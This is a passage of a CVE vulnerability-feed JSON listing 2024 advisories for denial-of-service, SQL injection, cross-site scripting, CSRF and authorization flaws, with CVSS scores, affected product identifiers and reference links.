"https://vuldb.com/?id.252038", "name" : "https://vuldb.com/?id.252038", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mafiatic:blue_server:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0888", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fitoxs.com/vuldb/27-exploit-perl.txt", "name" : "https://fitoxs.com/vuldb/27-exploit-perl.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://fitoxs.com/vuldb/27-exploit-perl.txt", "name" : "https://fitoxs.com/vuldb/27-exploit-perl.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252039", "name" : "https://vuldb.com/?ctiid.252039", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252039", "name" : "https://vuldb.com/?ctiid.252039", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252039", "name" : "https://vuldb.com/?id.252039", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252039", "name" : "https://vuldb.com/?id.252039", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:10n:borgchat:1.0.0:build438:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0889", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-404" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252041", "name" : "https://vuldb.com/?ctiid.252041", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252041", "name" : "https://vuldb.com/?ctiid.252041", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252041", "name" : "https://vuldb.com/?id.252041", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252041", "name" : "https://vuldb.com/?id.252041", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kmint21:golden_ftp_server:2.02b:*:*:*:professional:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0890", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/octopus_SQL2/blob/main/report.md", "name" : "https://github.com/biantaibao/octopus_SQL2/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/biantaibao/octopus_SQL2/blob/main/report.md", "name" : "https://github.com/biantaibao/octopus_SQL2/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252042", "name" : "https://vuldb.com/?ctiid.252042", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252042", "name" : "https://vuldb.com/?ctiid.252042", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252042", "name" : "https://vuldb.com/?id.252042", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252042", "name" : "https://vuldb.com/?id.252042", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hongmaple:octopus:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-25T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0891", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/octopus_XSS/blob/main/report.md", "name" : "https://github.com/biantaibao/octopus_XSS/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/biantaibao/octopus_XSS/blob/main/report.md", "name" : "https://github.com/biantaibao/octopus_XSS/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252043", "name" : "https://vuldb.com/?ctiid.252043", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252043", "name" : "https://vuldb.com/?ctiid.252043", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252043", "name" : "https://vuldb.com/?id.252043", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252043", "name" : "https://vuldb.com/?id.252043", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-252043." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hongmaple:octopus:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-25T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0892", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "name" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "name" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Schema App Structured Data plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the MarkUpdate function. This makes it possible for unauthenticated attackers to update and delete post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-14T04:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0893", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "name" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "name" : "https://plugins.trac.wordpress.org/browser/schema-app-structured-data-for-schemaorg/trunk/lib/SchemaEditor.php#L327", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1089ab17-b780-4840-8dcd-c50258513634?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1089ab17-b780-4840-8dcd-c50258513634?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1089ab17-b780-4840-8dcd-c50258513634?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1089ab17-b780-4840-8dcd-c50258513634?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Schema App Structured Data plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the MarkupUpdate function in all versions up to, and including, 2.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to update or delete post metadata." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:schemaapp:schema_app_structured_data:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-05-24T07:15Z", "lastModifiedDate" : "2025-04-04T18:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0895", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483", "name" : "https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483", "name" : "https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The PDF Flipbook, 3D Flipbook – DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dearhive:pdf_flipbook\\,_3d_flipbook:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.2.26", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-03T06:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0896", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13", "name" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13", "name" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding" : "2.7.4.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-02T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0897", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding" : "2.7.4.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-02T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0898", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/chat-bubble/", "name" : "https://wordpress.org/plugins/chat-bubble/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/chat-bubble/", "name" : "https://wordpress.org/plugins/chat-bubble/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bluecoral:chat_bubble:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 